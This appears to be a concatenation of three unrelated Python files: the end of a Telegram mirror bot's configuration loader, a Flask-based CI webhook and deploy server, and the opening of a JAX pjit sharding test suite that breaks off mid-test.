ZIP_UNZIP_LIMIT = getConfig('ZIP_UNZIP_LIMIT')
if len(ZIP_UNZIP_LIMIT) == 0:
raise KeyError
else:
ZIP_UNZIP_LIMIT = float(ZIP_UNZIP_LIMIT)
except KeyError:
ZIP_UNZIP_LIMIT = None
try:
RSS_CHAT_ID = getConfig('RSS_CHAT_ID')
if len(RSS_CHAT_ID) == 0:
raise KeyError
else:
RSS_CHAT_ID = int(RSS_CHAT_ID)
except KeyError:
RSS_CHAT_ID = None
try:
RSS_DELAY = getConfig('RSS_DELAY')
if len(RSS_DELAY) == 0:
raise KeyError
else:
RSS_DELAY = int(RSS_DELAY)
except KeyError:
RSS_DELAY = 900
try:
QB_TIMEOUT = getConfig('QB_TIMEOUT')
if len(QB_TIMEOUT) == 0:
raise KeyError
else:
QB_TIMEOUT = int(QB_TIMEOUT)
except KeyError:
QB_TIMEOUT = None
try:
BUTTON_FOUR_NAME = getConfig('BUTTON_FOUR_NAME')
BUTTON_FOUR_URL = getConfig('BUTTON_FOUR_URL')
if len(BUTTON_FOUR_NAME) == 0 or len(BUTTON_FOUR_URL) == 0:
raise KeyError
except KeyError:
BUTTON_FOUR_NAME = None
BUTTON_FOUR_URL = None
try:
BUTTON_FIVE_NAME = getConfig('BUTTON_FIVE_NAME')
BUTTON_FIVE_URL = getConfig('BUTTON_FIVE_URL')
if len(BUTTON_FIVE_NAME) == 0 or len(BUTTON_FIVE_URL) == 0:
raise KeyError
except KeyError:
BUTTON_FIVE_NAME = None
BUTTON_FIVE_URL = None
try:
BUTTON_SIX_NAME = getConfig('BUTTON_SIX_NAME')
BUTTON_SIX_URL = getConfig('BUTTON_SIX_URL')
if len(BUTTON_SIX_NAME) == 0 or len(BUTTON_SIX_URL) == 0:
raise KeyError
except KeyError:
BUTTON_SIX_NAME = None
BUTTON_SIX_URL = None
try:
STOP_DUPLICATE = getConfig('STOP_DUPLICATE')
STOP_DUPLICATE = STOP_DUPLICATE.lower() == 'true'
except KeyError:
STOP_DUPLICATE = False
try:
VIEW_LINK = getConfig('VIEW_LINK')
VIEW_LINK = VIEW_LINK.lower() == 'true'
except KeyError:
VIEW_LINK = False
try:
IS_TEAM_DRIVE = getConfig('IS_TEAM_DRIVE')
IS_TEAM_DRIVE = IS_TEAM_DRIVE.lower() == 'true'
except KeyError:
IS_TEAM_DRIVE = False
try:
USE_SERVICE_ACCOUNTS = getConfig('USE_SERVICE_ACCOUNTS')
USE_SERVICE_ACCOUNTS = USE_SERVICE_ACCOUNTS.lower() == 'true'
except KeyError:
USE_SERVICE_ACCOUNTS = False
try:
BLOCK_MEGA_FOLDER = getConfig('BLOCK_MEGA_FOLDER')
BLOCK_MEGA_FOLDER = BLOCK_MEGA_FOLDER.lower() == 'true'
except KeyError:
BLOCK_MEGA_FOLDER = False
try:
BLOCK_MEGA_LINKS = getConfig('BLOCK_MEGA_LINKS')
BLOCK_MEGA_LINKS = BLOCK_MEGA_LINKS.lower() == 'true'
except KeyError:
BLOCK_MEGA_LINKS = False
try:
WEB_PINCODE = getConfig('WEB_PINCODE')
WEB_PINCODE = WEB_PINCODE.lower() == 'true'
except KeyError:
WEB_PINCODE = False
try:
SHORTENER = getConfig('SHORTENER')
SHORTENER_API = getConfig('SHORTENER_API')
if len(SHORTENER) == 0 or len(SHORTENER_API) == 0:
raise KeyError
except KeyError:
SHORTENER = None
SHORTENER_API = None
try:
IGNORE_PENDING_REQUESTS = getConfig("IGNORE_PENDING_REQUESTS")
IGNORE_PENDING_REQUESTS = IGNORE_PENDING_REQUESTS.lower() == 'true'
except KeyError:
IGNORE_PENDING_REQUESTS = False
try:
BASE_URL = getConfig('BASE_URL_OF_BOT').rstrip("/")
if len(BASE_URL) == 0:
raise KeyError
except KeyError:
logging.warning('BASE_URL_OF_BOT not provided!')
BASE_URL = None
try:
AS_DOCUMENT = getConfig('AS_DOCUMENT')
AS_DOCUMENT = AS_DOCUMENT.lower() == 'true'
except KeyError:
AS_DOCUMENT = False
try:
EQUAL_SPLITS = getConfig('EQUAL_SPLITS')
EQUAL_SPLITS = EQUAL_SPLITS.lower() == 'true'
except KeyError:
EQUAL_SPLITS = False
try:
QB_SEED = getConfig('QB_SEED')
QB_SEED = QB_SEED.lower() == 'true'
except KeyError:
QB_SEED = False
try:
CUSTOM_FILENAME = getConfig('CUSTOM_FILENAME')
if len(CUSTOM_FILENAME) == 0:
raise KeyError
except KeyError:
CUSTOM_FILENAME = None
try:
CRYPT = getConfig('CRYPT')
if len(CRYPT) == 0:
raise KeyError
except KeyError:
CRYPT = None
try:
TOKEN_PICKLE_URL = getConfig('TOKEN_PICKLE_URL')
if len(TOKEN_PICKLE_URL) == 0:
raise KeyError
try:
res = rget(TOKEN_PICKLE_URL)
if res.status_code == 200:
with open('token.pickle', 'wb+') as f:
f.write(res.content)
else:
logging.error(f"Failed to download token.pickle, link got HTTP response: {res.status_code}")
except Exception as e:
logging.error(f"TOKEN_PICKLE_URL: {e}")
except KeyError:
pass
try:
ACCOUNTS_ZIP_URL = getConfig('ACCOUNTS_ZIP_URL')
if len(ACCOUNTS_ZIP_URL) == 0:
raise KeyError
else:
try:
res = rget(ACCOUNTS_ZIP_URL)
if res.status_code == 200:
with open('accounts.zip', 'wb+') as f:
f.write(res.content)
else:
logging.error(f"Failed to download accounts.zip, link got HTTP response: {res.status_code}")
except Exception as e:
logging.error(f"ACCOUNTS_ZIP_URL: {e}")
raise KeyError
srun(["unzip", "-q", "-o", "accounts.zip"])
srun(["chmod", "-R", "777", "accounts"])
osremove("accounts.zip")
except KeyError:
pass
try:
MULTI_SEARCH_URL = getConfig('MULTI_SEARCH_URL')
if len(MULTI_SEARCH_URL) == 0:
raise KeyError
try:
res = rget(MULTI_SEARCH_URL)
if res.status_code == 200:
with open('drive_folder', 'wb+') as f:
f.write(res.content)
else:
logging.error(f"Failed to download drive_folder, link got HTTP response: {res.status_code}")
except Exception as e:
logging.error(f"MULTI_SEARCH_URL: {e}")
except KeyError:
pass
try:
YT_COOKIES_URL = getConfig('YT_COOKIES_URL')
if len(YT_COOKIES_URL) == 0:
raise KeyError
try:
res = rget(YT_COOKIES_URL)
if res.status_code == 200:
with open('cookies.txt', 'wb+') as f:
f.write(res.content)
else:
logging.error(f"Failed to download cookies.txt, link got HTTP response: {res.status_code}")
except Exception as e:
logging.error(f"YT_COOKIES_URL: {e}")
except KeyError:
pass
DRIVES_NAMES.append("Main")
DRIVES_IDS.append(parent_id)
if ospath.exists('drive_folder'):
with open('drive_folder', 'r+') as f:
lines = f.readlines()
for line in lines:
try:
temp = line.strip().split()
DRIVES_IDS.append(temp[1])
DRIVES_NAMES.append(temp[0].replace("_", " "))
except:
pass
try:
INDEX_URLS.append(temp[2])
except IndexError as e:
INDEX_URLS.append(None)
try:
SEARCH_PLUGINS = getConfig('SEARCH_PLUGINS')
if len(SEARCH_PLUGINS) == 0:
raise KeyError
SEARCH_PLUGINS = jsnloads(SEARCH_PLUGINS)
except KeyError:
SEARCH_PLUGINS = None
updater = tgUpdater(token=BOT_TOKEN, request_kwargs={'read_timeout': 20, 'connect_timeout': 15})
bot = updater.bot
dispatcher = updater.dispatcher
job_queue = updater.job_queue
|
ci.py
|
import json
import logging
import collections
import requests
import threading
import time
from batch.client import Job
from flask import Flask, request, jsonify, render_template
from flask_cors import CORS
from .batch_helper import try_to_cancel_job, job_ordering
from .ci_logging import log
from .constants import BUILD_JOB_TYPE, GCS_BUCKET, DEPLOY_JOB_TYPE
from .environment import \
batch_client, \
WATCHED_TARGETS, \
REFRESH_INTERVAL_IN_SECONDS
from .git_state import Repo, FQRef, FQSHA
from .github import open_pulls, overall_review_state, latest_sha_for_ref
from .google_storage import \
upload_public_gs_file_from_filename, \
upload_public_gs_file_from_string
from .http_helper import BadStatus, get_repo
from .pr import GitHubPR
from .prs import PRS
prs = PRS({k: v for [k, v] in WATCHED_TARGETS})
app = Flask(__name__)
CORS(app)
@app.errorhandler(BadStatus)
def handle_invalid_usage(error):
log.exception('bad status found when making request')
return jsonify(error.data), error.status_code
@app.route('/status')
def status():
return jsonify(prs.to_json())
@app.route('/push', methods=['POST'])
def github_push():
d = request.json
if 'zen' in d:
log.info(f'received zen: {d["zen"]}')
return '', 200
ref = d['ref']
if ref.startswith('refs/heads'):
target_ref = FQRef(Repo.from_gh_json(d['repository']), ref[11:])
target = FQSHA(target_ref, d['after'])
prs.push(target)
else:
log.info(
f'ignoring ref push {ref} because it does not start with '
'"refs/heads/"'
)
return '', 200
@app.route('/pull_request', methods=['POST'])
def github_pull_request():
d = request.json
if 'zen' in d:
log.info(f'received zen: {d["zen"]}')
return '', 200
assert 'action' in d, d
assert 'pull_request' in d, d
action = d['action']
if action in ('opened', 'synchronize'):
target_sha = FQSHA.from_gh_json(d['pull_request']['base']).sha
gh_pr = GitHubPR.from_gh_json(d['pull_request'], target_sha)
prs.pr_push(gh_pr)
elif action == 'closed':
gh_pr = GitHubPR.from_gh_json(d['pull_request'])
log.info(f'forgetting closed pr {gh_pr.short_str()}')
prs.forget(gh_pr.source.ref, gh_pr.target_ref)
else:
log.info(f'ignoring pull_request with action {action}')
return '', 200
@app.route('/pull_request_review', methods=['POST'])
def github_pull_request_review():
d = request.json
if 'zen' in d:
log.info(f'received zen: {d["zen"]}')
return '', 200
action = d['action']
gh_pr = GitHubPR.from_gh_json(d['pull_request'])
if action == 'submitted':
state = d['review']['state'].lower()
if state == 'changes_requested':
prs.review(gh_pr, state)
else:
# FIXME: track all reviewers, then we don't need to talk to github
prs.review(
gh_pr,
overall_review_state(
get_reviews(gh_pr.target_ref.repo,
gh_pr.number))['state'])
elif action == 'dismissed':
# FIXME: track all reviewers, then we don't need to talk to github
prs.review(
gh_pr,
overall_review_state(get_reviews(gh_pr.target_ref.repo,
gh_pr.number))['state'])
else:
log.info(f'ignoring pull_request_review with action {action}')
return '', 200
@app.route('/ci_build_done', methods=['POST'])
def ci_build_done():
d = request.json
attributes = d['attributes']
source = FQSHA.from_json(json.loads(attributes['source']))
target = FQSHA.from_json(json.loads(attributes['target']))
job = Job(batch_client, d['id'], attributes=attributes, _status=d)
receive_ci_job(source, target, job)
return '', 200
@app.route('/deploy_build_done', methods=['POST'])
def deploy_build_done():
d = request.json
attributes = d['attributes']
target = FQSHA.from_json(json.loads(attributes['target']))
job = Job(batch_client, d['id'], attributes=attributes, _status=d)
receive_deploy_job(target, job)
return '', 200
@app.route('/refresh_batch_state', methods=['POST'])
def refresh_batch_state():
jobs = batch_client.list_jobs()
build_jobs = [
job for job in jobs
if job.attributes and job.attributes.get('type', None) == BUILD_JOB_TYPE
]
refresh_ci_build_jobs(build_jobs)
deploy_jobs = [
job for job in jobs
if job.attributes and job.attributes.get('type', None) == DEPLOY_JOB_TYPE
]
refresh_deploy_jobs(deploy_jobs)
return '', 200
def refresh_ci_build_jobs(jobs):
jobs = [
(FQSHA.from_json(json.loads(job.attributes['source'])),
FQSHA.from_json(json.loads(job.attributes['target'])),
job)
for job in jobs
]
jobs = [(s, t, j) for (s, t, j) in jobs if prs.exists(s, t)]
latest_jobs = {}
for (source, target, job) in jobs:
key = (source, target)
job2 = latest_jobs.get(key, None)
if job2 is None:
latest_jobs[key] = job
else:
if job_ordering(job, job2) > 0:
log.info(
f'cancelling {job2.id}, preferring {job.id}'
)
try_to_cancel_job(job2)
latest_jobs[key] = job
else:
log.info(
f'cancelling {job.id}, preferring {job2.id}'
)
try_to_cancel_job(job)
prs.refresh_from_ci_jobs(latest_jobs)
def refresh_deploy_jobs(jobs):
jobs = [
(FQSHA.from_json(json.loads(job.attributes['target'])),
job)
for job in jobs
if 'target' in job.attributes
]
jobs = [
(target, job)
for (target, job) in jobs
if target.ref in prs.deploy_jobs
]
latest_jobs = {}
for (target, job) in jobs:
job2 = latest_jobs.get(target, None)
if job2 is None:
latest_jobs[target] = job
else:
if job_ordering(job, job2) > 0:
log.info(
f'cancelling {job2.id}, preferring {job.id}'
)
try_to_cancel_job(job2)
latest_jobs[target] = job
else:
log.info(
f'cancelling {job.id}, preferring {job2.id}'
)
try_to_cancel_job(job)
prs.refresh_from_deploy_jobs(latest_jobs)
@app.route('/force_retest', methods=['POST'])
def force_retest():
d = request.json
source = FQRef.from_json(d['source'])
target = FQRef.from_json(d['target'])
prs.build(source, target)
return '', 200
@app.route('/force_redeploy', methods=['POST'])
def force_redeploy():
d = request.json
target = FQRef.from_json(d)
if target in prs.watched_target_refs():
prs.try_deploy(target)
return '', 200
else:
return f'{target.short_str()} not in {[ref.short_str() for ref in prs.watched_target_refs()]}', 400
@app.route('/refresh_github_state', methods=['POST'])
def refresh_github_state():
for target_repo in prs.watched_repos():
try:
pulls = open_pulls(target_repo)
pulls_by_target = collections.defaultdict(list)
latest_target_shas = {}
for pull in pulls:
gh_pr = GitHubPR.from_gh_json(pull)
if gh_pr.target_ref not in latest_target_shas:
latest_target_shas[gh_pr.target_ref] = latest_sha_for_ref(gh_pr.target_ref)
sha = latest_target_shas[gh_pr.target_ref]
gh_pr.target_sha = sha
pulls_by_target[gh_pr.target_ref].append(gh_pr)
refresh_pulls(target_repo, pulls_by_target)
refresh_reviews(pulls_by_target)
except Exception as e:
log.exception(
f'could not refresh state for {target_repo.short_str()} due to {e}')
return '', 200
def refresh_pulls(target_repo, pulls_by_target):
dead_targets = (
set(prs.live_target_refs_for_repo(target_repo)) -
{x for x in pulls_by_target.keys()}
)
for dead_target_ref in dead_targets:
prs.forget_target(dead_target_ref)
for (target_ref, pulls) in pulls_by_target.items():
for gh_pr in pulls:
prs.pr_push(gh_pr)
dead_prs = ({x.source.ref for x in prs.for_target(target_ref)} -
{x.source.ref for x in pulls})
if len(dead_prs) != 0:
log.info(f'for {target_ref.short_str()}, forgetting {[x.short_str() for x in dead_prs]}')
for source_ref in dead_prs:
prs.forget(source_ref, target_ref)
def refresh_reviews(pulls_by_target):
for (_, pulls) in pulls_by_target.items():
for gh_pr in pulls:
reviews = get_repo(
gh_pr.target_ref.repo.qname,
'pulls/' + gh_pr.number + '/reviews',
status_code=200)
state = overall_review_state(reviews)['state']
prs.review(gh_pr, state)
@app.route('/heal', methods=['POST'])
def heal():
prs.heal()
return '', 200
@app.route('/healthcheck')
def healthcheck():
return '', 200
@app.route('/watched_repo', methods=['POST'])
def set_deployable():
d = request.json
target_ref = FQRef.from_json(d['target_ref'])
action = d['action']
assert action in ('unwatch', 'watch', 'deploy')
prs.update_watch_state(target_ref, action)
return '', 200
@app.route('/ui/')
def ui_index():
targets = {}
for target_ref, deployed_sha in prs.latest_deployed.items():
targets[target_ref] = {
'ref': target_ref,
'deployed_sha': deployed_sha,
'job': prs.deploy_jobs.get(target_ref, None)
}
return render_template(
'index.html',
prs_by_target=prs.all_by_target().items(),
targets=targets)
@app.route('/ui/job-log/<id>')
def job_log(id):
j = batch_client.get_job(id)
return render_template(
'job-log.html',
id=j.id,
log=j.log())
###############################################################################
def receive_ci_job(source, target, job):
upload_public_gs_file_from_string(GCS_BUCKET,
f'ci/{source.sha}/{target.sha}/job.log',
job.cached_status()['log'])
upload_public_gs_file_from_filename(
GCS_BUCKET,
f'ci/{source.sha}/{target.sha}/index.html',
'index.html')
prs.ci_build_finished(source, target, job)
def receive_deploy_job(target, job):
upload_public_gs_file_from_string(GCS_BUCKET,
f'deploy/{target.sha}/job.log',
job.cached_status()['log'])
upload_public_gs_file_from_filename(
GCS_BUCKET,
f'deploy/{target.sha}/index.html',
'deploy-index.html')
prs.deploy_build_finished(target, job)
def get_reviews(repo, pr_number):
return get_repo(
repo.qname,
'pulls/' + pr_number + '/reviews',
status_code=200)
def polling_event_loop():
time.sleep(1)
while True:
try:
r = requests.post(
'http://127.0.0.1:5000/refresh_github_state',
timeout=360)
r.raise_for_status()
r = requests.post(
'http://127.0.0.1:5000/refresh_batch_state',
timeout=360)
r.raise_for_status()
r = requests.post('http://127.0.0.1:5000/heal', timeout=360)
r.raise_for_status()
except Exception as e:
log.error(f'Could not poll due to exception: {e}')
time.sleep(REFRESH_INTERVAL_IN_SECONDS)
def fix_werkzeug_logs():
# https://github.com/pallets/flask/issues/1359#issuecomment-291749259
werkzeug_logger = logging.getLogger('werkzeug')
from werkzeug.serving import WSGIRequestHandler
WSGIRequestHandler.log = lambda self, type, message, *args: \
getattr(werkzeug_logger, type)('%s %s' % (self.address_string(), message % args))
def run():
"""Main entry point."""
fix_werkzeug_logs()
threading.Thread(target=polling_event_loop).start()
app.run(host='0.0.0.0', threaded=False)
|
pjit_test.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from functools import partial
import logging
import threading
import unittest
from collections import OrderedDict, namedtuple
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
import jax
import jax.numpy as jnp
from jax._src import test_util as jtu
from jax.errors import JAXTypeError
from jax import lax
# TODO(skye): do we still wanna call this PartitionSpec?
from jax.experimental import PartitionSpec as P
from jax.experimental.maps import xmap, mesh, Mesh
from jax.experimental import global_device_array
import jax.experimental.pjit as pjit_lib
from jax.experimental.pjit import (pjit, pjit_p, with_sharding_constraint,
SpecSync, FROM_GDA)
from jax.interpreters import pxla
from jax.interpreters import xla
from jax._src.lib import xla_client
from jax._src.util import prod, curry, unzip2
from jax.config import config
config.parse_flags_with_absl()
def setUpModule():
if jax.default_backend() not in {'gpu', 'tpu'}:
raise unittest.SkipTest("pjit only supports GPU and TPU backends")
jtu.set_spmd_lowering_flag(True)
def tearDownModule():
jtu.restore_spmd_lowering_flag()
@curry
def check_1d_2d_mesh(f, set_mesh):
return parameterized.named_parameters(
{"testcase_name": "_" + name, "mesh": mesh, "resources": resources}
for name, mesh, resources in (
("2", (("x", 2),), "x"),
("2x1", (("x", 2), ("y", 1)), ("x", "y")),
("2x2", (("x", 2), ("y", 2)), ("x", "y")),
))(jtu.with_mesh_from_kwargs(f) if set_mesh else f)
def create_global_mesh(mesh_shape, axis_names):
size = prod(mesh_shape)
if len(jax.devices()) < size:
raise unittest.SkipTest(f"Test requires {size} local devices")
mesh_devices = np.array(jax.devices()[:size]).reshape(mesh_shape)
global_mesh = Mesh(mesh_devices, axis_names)
return global_mesh
# TODO(skye): make the buffer donation utils part of JaxTestCase
class PJitTest(jtu.BufferDonationTestCase):
@jtu.with_mesh([('x', 1)])
def testDeviceBufferAval(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=P('x'))
def f(x):
return x
shape = (2, 2)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x)
expected = x
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 1)
self.assertAllClose(
actual.device_buffers[0].to_py(), expected, check_dtypes=False)
# Repro for a bug on device_buffer aval
_ = repr(actual.device_buffers)
@jtu.with_mesh([('x', 2)])
def testBasic1D(self):
@partial(pjit,
in_axis_resources=(P('x'), P('x')),
out_axis_resources=None)
def f(x, y):
return x + y
shape = (8, 8)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x, x + 1)
expected = x + (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testBasic2D(self):
@partial(pjit,
in_axis_resources=(P(None, 'x', 'y'), P('y')),
out_axis_resources=P('x'))
def f(x, y):
return x @ y
x_shape = (8, 6, 4)
y_shape = (4, 2)
x = jnp.arange(np.prod(x_shape)).reshape(x_shape)
y = jnp.arange(np.prod(y_shape)).reshape(y_shape)
actual = f(x, y)
expected = x @ y
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
split0, split1 = np.split(expected, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), split1,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), split1,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testTwoMeshAxisSharding(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
actual = f(x, x + 1)
expected = x @ (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
@jtu.with_mesh([('x', 2)])
def testBufferDonation(self):
@partial(pjit,
in_axis_resources=P('x'),
out_axis_resources=P('x'),
donate_argnums=0)
def f(x, y):
return x + y
shard = pjit(lambda x: x, in_axis_resources=P('x'),
out_axis_resources=P('x'))
x = shard(jnp.ones((2, 5)) * 4)
y = shard(jnp.ones((2, 5)) * 2)
expected = x + y
self.assertAllClose(f(x, y), expected)
self.assertNotDeleted(y)
self.assertDeleted(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraint(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
y = x + 1
y = with_sharding_constraint(y, P('x', 'y'))
return y * 2
shape = (8, 8)
x = np.arange(prod(shape)).reshape(shape)
expected = (x + 1) * 2
actual = f(x)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
hlo = jax.xla_computation(f)(np.ones(shape))
# Annotation from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraintPyTree(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
x = with_sharding_constraint(x, [P('x', 'y'), P('y', 'x')])
x = x.copy()
x[0]["a"] *= 2
return x
shape = (8, 8)
v = np.arange(prod(shape)).reshape(shape)
x = [{"a": v, "b": v * 2}, v * 3]
actual = f(x)
expected = x.copy()
expected[0]["a"] *= 2
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertLen(actual[0]["a"].device_buffers, 2)
hlo = jax.xla_computation(f)(x)
# Annotations from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
self.assertIn("sharding={devices=[1,2]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
def testCaching(self):
def f(x):
assert should_be_tracing
return jnp.sin(x) * 2
x = np.arange(16).reshape(4, 4)
devices = np.array(list(jax.local_devices())[:4])
if devices.size < 4:
raise unittest.SkipTest("Test requires 4 devices")
devices = devices.reshape((2, 2))
with mesh(devices, ('x', 'y')):
should_be_tracing = True
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
# Re-create the mesh to make sure that has no influence on caching
with mesh(devices, ('x', 'y')):
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testNested(self):
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum() + h.sum(), in_axis_resources=P('x', 'y'), out_axis_resources=None)
g = pjit(lambda x: f(jnp.sin(x)), in_axis_resources=P('x', None), out_axis_resources=None)
x = jnp.arange(16).reshape((4, 4))
y = g(x)
self.assertAllClose(y, jnp.sin(x).sum() + h.sum())
self.assertTrue(hasattr(y, "sharding_spec"))
@check_1d_2d_mesh(set_mesh=True)
def testAutodiff(self, mesh, resources):
if len(mesh) != 2: return
assert resources == ('x', 'y')
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum(1) * h.sum(),
in_axis_resources=P('x', 'y'), out_axis_resources=P(('x', 'y')))
g = pjit(lambda x: f(jnp.sin(x * 4 + 2)),
in_axis_resources=P('x', None), out_axis_resources=P(('x', 'y')))
jtu.check_grads(g, (jnp.arange(16, dtype=jnp.float32).reshape((4, 4)) / 100,),
order=2)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testEvalJaxpr(self):
x, y = jnp.arange(4), jnp.arange(5)
f = pjit(lambda x, y: x.sum() + jnp.sin(y),
in_axis_resources=(P('x'), P('y')),
out_axis_resources=P('y'))
f_jaxpr = jax.make_jaxpr(f)(x, y)
f_eval = jax.core.jaxpr_as_fun(f_jaxpr)
r, = f_eval(x, y)
self.assertAllClose(r, x.sum() + jnp.sin(y))
@jtu.with_mesh([('x', 2)])
def testNonArrayArg(self):
self.assertEqual(pjit(lambda x: x + 2,
in_axis_resources=None,
out_axis_resources=None)(1), 3)
@jtu.with_mesh([('x', 2)])
def testNonHashableAxisResources(self):
x = jnp.arange(4)
y = pjit(lambda x: {'b': x['a'] + 2},
in_axis_resources=({'a': P('x')},),
out_axis_resources={'b': P('x')})({'a': x})
self.assertAllClose(y, {'b': x + 2})
@jtu.with_mesh([('x', 2)])
def testGradOfConstraint(self):
# Make sure that we can compute grads through sharding constraints
h = lambda x: jnp.sin(with_sharding_constraint(x, P('x'))).sum()
f = pjit(lambda x: jax.grad(h)(x),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(8, dtype=jnp.float32)
self.assertAllClose(f(x), jnp.cos(x))
@jtu.with_mesh([('x', 2)])
def testNoopPartitionSpecs(self):
noops = [P(), P(None), P(()), P((), None), P(None, None, ())]
x = jnp.arange(8).reshape((2, 2, 2))
for spec in noops:
y = pjit(lambda x: x * 2, in_axis_resources=spec, out_axis_resources=spec)(x)
self.assertAllClose(y, x * 2)
@jtu.with_mesh([('x', 2)])
def testVmapModifiesAxisResources(self):
h = pjit(lambda x, y: (x + y, x, y), in_axis_resources=P('x'), out_axis_resources=None)
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(h, in_axes=(None, 0)))(x, y).jaxpr
eqn = jaxpr.eqns[0]
self.assertIs(eqn.primitive, pjit_p)
x_sync, y_sync = (spec.sync for spec in eqn.params['in_axis_resources'])
self.assertEqual(x_sync, SpecSync.IN_SYNC)
self.assertEqual(y_sync, SpecSync.DIM_PERMUTE)
x_sync, y_sync, z_sync = (spec.sync for spec in eqn.params['out_axis_resources'])
self.assertEqual(x_sync, SpecSync.DIM_PERMUTE)
self.assertEqual(y_sync, SpecSync.IN_SYNC)
self.assertEqual(z_sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2)])
def testVMap(self):
f = pjit(lambda x, y: (x + y, x), in_axis_resources=P('x'), out_axis_resources=P('x'))
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
z, w = jax.vmap(f, in_axes=(None, 0), out_axes=(0, None))(x, y)
self.assertAllClose(z, x + y)
self.assertAllClose(w, x)
self.assertEqual(z.sharding_spec.sharding, (pxla.NoSharding(), pxla.Chunked([2])))
self.assertEqual(w.sharding_spec.sharding, (pxla.Chunked([2]),))
@jtu.with_mesh([('x', 2)])
def testVMapShardingConstraint(self):
f = pjit(lambda x: with_sharding_constraint(x, P('x')),
in_axis_resources=P(), out_axis_resources=P('x'))
x = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(f))(x)
pjit_eqn, = jaxpr.eqns
constraint_eqn, = pjit_eqn.params['jaxpr'].eqns
self.assertEqual(constraint_eqn.params['axis_resources'].partitions, ((), ('x',)))
self.assertEqual(constraint_eqn.params['axis_resources'].sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingInXMap(self):
h = pjit(lambda x: x, in_axis_resources=P('x'), out_axis_resources=None)
f = xmap(lambda x: h(x * 2), in_axes=['i', ...], out_axes=['i', ...],
axis_resources={'i': 'y'})
x = jnp.arange(16).reshape((4, 4))
rule = xla._translations[pjit_p]
test_rule_called = False
def _test_rule(*args, **kwargs):
nonlocal test_rule_called
test_rule_called = True
in_axis_resources = kwargs['in_axis_resources']
self.assertEqual(len(in_axis_resources), 1)
self.assertIn(('y',), in_axis_resources[0].partitions)
return rule(*args, **kwargs)
try:
xla._translations[pjit_p] = _test_rule
f(x)
self.assertTrue(test_rule_called)
finally:
xla._translations[pjit_p] = rule
@jtu.with_mesh([('x', 2)])
def testLowerWithDuckTyping(self):
x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
# Make sure this doesn't crash
pjit(lambda x: x + 4,
in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)
@jtu.with_mesh([('x', 2)])
def testLowerDonateArgnumsAvailable(self):
x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
